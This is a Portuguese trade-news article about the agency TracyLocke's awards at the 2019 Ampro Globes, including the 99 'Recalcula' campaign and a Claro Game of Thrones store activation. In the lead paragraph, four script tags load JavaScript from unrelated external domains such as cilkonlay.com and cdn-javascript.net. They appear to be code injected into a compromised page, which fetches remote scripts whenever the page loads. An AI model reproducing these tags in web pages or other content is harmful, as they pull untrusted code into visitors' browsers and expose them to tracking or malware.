Premiações

TracyLocke brilha no Ampro Globes Awards

Agência global de <em>shopper experience</em> conquistou 5 Ouros e uma Prata<em> </em>no maior prêmio do live marketing do Brasil. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573685977744" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Agência global de shopper experience conquistou 5 Ouros e uma Prata no maior prêmio do live marketing do Brasil.

TracyLocke foi uma das protagonistas na edição 2019 do Ampro Globes Awards 2019. A agência global de shopper experience dos Grupos Omnicom/DDB e ABC viu quatro dos seus executivos conquistarem os prêmios como os melhores regionais de 2019 e a 99 ser o “Cliente do Ano”.

As principais premiações do mercado você confere aqui.

Leia também: TracyLocke fatura Bronze no LIA 2019.

“Esses prêmios representam o trabalho de um time incrível dedicado a reimaginar tudo: nossos projetos, a relação com os clientes, a forma como cuidamos da nossa gente e da nossa cultura. A TracyLocke Brasil tem pouco mais de 2 anos e fecha a temporada de premiações com um score incrível que inclui, além do Ampro Globes Awards premiações no El Ojo, LIA Festival, NY Global Festival, Shortlist no Effie e Clio Awards. Estamos muito orgulhos por contribuir com projetos efetivos para os nossos clientes e reconhecidos pelo mercado.”, comemora o CEO da TracyLocke, Thomas Tagliaferro.

O projeto “Recalcula”, criação da TracyLocke para 99, conquistou quatro Ouros, nas seguintes categorias: Melhor Ação Promocional de PDV, Melhor Ativação de Marca, Melhor Campanha Promocional e Melhor Campanha de Comunicação Integrada. Além disso, foi eleito o Cliente de 2019.

A campanha mostrava aos consumidores e motoristas as vantagens financeiras de se utilizar o 99. Dentre as ativações, a campanha contou com o combo ingresso de cinema, pipoca e refrigerante por apenas R$ 0,99, o lanche Whopper do Burger King a R$ 9,99 e até passagens aéreas por R$ 99 – tudo para chamar a atenção do público para as vantagens de usar 99 e o preço do serviço.

Até gasolina com desconto foi possível usar. Os influenciadores digitais ajudaram a disseminar a mensagem, elaborando conteúdos autênticos e exclusivos para a ação, impulsionando o alcance da estrelada campanha.

Para a Claro, a TracyLocke criou uma estratégia para comunicar a última temporada de Game of Thrones (GoT) no Brasil, que envolveu desde a transformação das lojas em experiências dos Reinos do Fogo e Gelo, e que rendeu uma Prata na categoria Melhor Campanha de PDV 2019, até a criação de um controle remoto exclusivo em formato de ovo de dragão, um mimo que conquistou influenciadores, formadores de opinião e fãs da série e rendeu uma medalha de Ouro na categoria Melhor Campanha de Marketing Direto.

Quatro profissionais da TracyLocke Brasil também receberam distinção especial e foram consagrados os melhores de 2019 na Regional Sudeste. O Chief Strategy Officer (CSO) da agência, Jader Crivelaro, conquistou o prêmio de Melhor Profissional de Planejamento em 2019; o diretor-executivo de Negócios da agência, Michel Issa, faturou o prêmio de Melhor Profissional de Atendimento; a diretora-executiva de Criação, Luciane Mônaco, foi a Melhor Profissional de Criação; e, por fim, Breno Ferreira, VP de Experience, faturou o prêmio de Melhor Profissional de Produção.

A cerimônia do maior prêmio de live marketing do Brasil aconteceu na última segunda-feira, dia 11, no Palácio Tangará, em São Paulo, e foi promovida pela Ampro.